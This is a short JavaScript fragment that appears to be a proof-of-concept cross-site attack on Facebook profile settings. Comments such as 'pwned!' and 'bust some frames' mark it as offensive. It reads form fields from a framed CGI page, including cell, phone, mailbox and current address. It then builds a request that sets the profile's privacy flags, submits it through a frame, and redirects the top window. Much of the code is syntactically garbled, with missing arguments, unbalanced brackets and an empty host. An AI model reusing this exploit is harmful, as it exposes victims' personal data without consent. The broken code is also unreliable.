function f2() { // load the facebook values... cross-site security? what's that? window.frames['script'location="/cgi-bin/script.cgi"; } function f3() { // wait for the cgi to respond try { test = window.frames['script'].document.forms[0].website.value; } catch (e) { setTimeout('f3();',1500); return; } // populate the new request f = window.frames[script'].document.forms[0]; request_string = "http://" + encodeURIComponent( + "" + encodeURIComponent( + "&sn=" + encodeURIComponent( + "&cell=" + encodeURIComponent(f.cell.value) + "&phone=" + encodeURIComponent( + "&mailbox=" + encodeURIComponent(f.mailbox.value) + "&cur_address=" + encodeURIComponent(f.cur_address.value) + "&website=" + encodeURIComponent( + "&show_email=8&show_aim=26&show_cell=26&show_phone=26&show_mailbox=26&show_address=26&save=Save"; // pwned! //window.frames['script'].document.write(request_string); window.frames[.face'].location=request_string; setTimeout('f4()', 3000); } function f4() { // bust some frames top.location.href = ""; } // byebye -->